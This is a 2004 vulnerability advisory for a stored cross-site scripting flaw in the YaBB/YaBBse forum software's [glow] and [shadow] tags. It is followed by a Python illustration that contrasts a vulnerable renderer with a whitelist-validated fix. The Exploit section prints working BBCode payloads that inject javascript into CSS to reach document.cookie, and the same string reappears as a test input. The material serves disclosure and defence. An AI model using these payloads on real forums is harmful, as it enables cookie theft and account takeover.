#####################################################################
Advisory Name : YaBB/YaBBse Cross Site Scripting Vulnerability
Release Date  : Mar 14, 2004
Application   : YaBB/YaBBse
Tested On     : YaBB 1 Gold (SP1.3), YaBB SE 1.5.1 Final
Vendor URL    : http://www.yabbforum.com/
                http://www.yabbse.org/
Discovered by : Cheng Peng Su (apple_soup_at_msn.com)
#####################################################################

Proof of concept:

The problem is in the [glow] and [shadow] tags: YaBB does not filter the characters in these tags' parameters. The attack does not require the visitor to click any link; the XSS code is executed as soon as the visitor reads the thread.

Exploit:

[glow=red);background:url(javascript:alert(document.cookie));filter:glow(color=red,2,300]Big Exploit[/glow]

[shadow=red);background:url(javascript:alert(document.cookie));filter:shadow(color=red,left,300]Big Exploit[/shadow]

Contact:

Cheng Peng Su
Class 1, Senior 2, High school attached to Wuhan University
Wuhan, Hubei, China (430072)
apple_soup_at_msn.com
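The payload above works because the tag parameter is spliced into a CSS `filter:` declaration, so a `)` followed by `;` lets the author add further declarations, here a `background:url(javascript:...)`. The following is an added illustration, not YaBB's or YaBBse's own code: a small Python reimplementation of the tag rendering that shows the vulnerable pattern beside a hardened one. The exact `filter:glow(color=PARAMS)` template, the `color,strength,width` and `color,direction,width` parameter grammar and the numeric limits are assumptions modelled on the advisory's example tags, not the forum's real markup; the sample inputs are constructed.

```python
import html
import re

# Constructed inputs: one benign use of each tag, and the parameter shape the advisory reports.
BENIGN_GLOW = "[glow=red,2,300]Hello[/glow]"
BENIGN_SHADOW = "[shadow=#336699,left,300]Hello[/shadow]"
HOSTILE_GLOW = ("[glow=red);background:url(javascript:alert(document.cookie));"
                "filter:glow(color=red,2,300]Big Exploit[/glow]")

# [glow=PARAMS]...[/glow] and [shadow=PARAMS]...[/shadow]; PARAMS runs up to the first ']'.
TAG_RE = re.compile(r"\[(glow|shadow)=([^\]]*)\](.*?)\[/\1\]", re.IGNORECASE | re.DOTALL)

# Assumed whitelist grammar for the parameters: a CSS colour keyword or #hex, then either a
# small integer (glow strength) or a direction keyword (shadow), then a pixel width.
COLOR_RE = re.compile(r"^(?:[a-zA-Z]{1,20}|#[0-9a-fA-F]{3}|#[0-9a-fA-F]{6})$")
DIRECTIONS = {"left", "right", "up", "down"}


def validate_params(tag, params):
    """Return (color, middle, width) when params match the whitelist grammar, else None."""
    parts = params.split(",")
    if len(parts) != 3:
        return None
    color, middle, width = (p.strip() for p in parts)
    if not COLOR_RE.match(color) or not width.isdigit() or int(width) > 2000:
        return None
    if tag == "glow":
        if not middle.isdigit() or int(middle) > 100:
            return None
        return (color, int(middle), int(width))
    if middle.lower() not in DIRECTIONS:
        return None
    return (color, middle.lower(), int(width))


def _style(tag, color, middle, width):
    """Build the style declaration only from values that already passed validation."""
    if tag == "glow":
        return f"filter:glow(color={color},strength={middle});width:{width}px"
    return f"filter:shadow(color={color},direction={middle});width:{width}px"


def render_unsafe(bbcode):
    """Vulnerable pattern: the raw parameter string is spliced into the style attribute,
    so a parameter containing ');' can add arbitrary CSS declarations."""
    def sub(m):
        tag, params, body = m.group(1).lower(), m.group(2), html.escape(m.group(3))
        return f'<span style="filter:{tag}(color={params})">{body}</span>'
    return TAG_RE.sub(sub, bbcode)


def render_safe(bbcode):
    """Hardened pattern: parameters must pass validate_params; otherwise the tag is
    emitted as escaped plain text and never reaches a style attribute."""
    def sub(m):
        tag, params, body = m.group(1).lower(), m.group(2), html.escape(m.group(3))
        parsed = validate_params(tag, params)
        if parsed is None:
            return html.escape(m.group(0))  # refuse to style; show the raw tag harmlessly
        return f'<span style="{_style(tag, *parsed)}">{body}</span>'
    return TAG_RE.sub(sub, bbcode)


if __name__ == "__main__":
    print("unsafe:", render_unsafe(HOSTILE_GLOW))
    print("safe:  ", render_safe(HOSTILE_GLOW))
    print("safe:  ", render_safe(BENIGN_SHADOW))
```

The design point is that the fix is a positive grammar for each parameter rather than a blacklist of `javascript:` or `)`; a renderer that only ever interpolates values it has parsed into known types cannot be steered into emitting extra declarations regardless of which browser-specific CSS features are available.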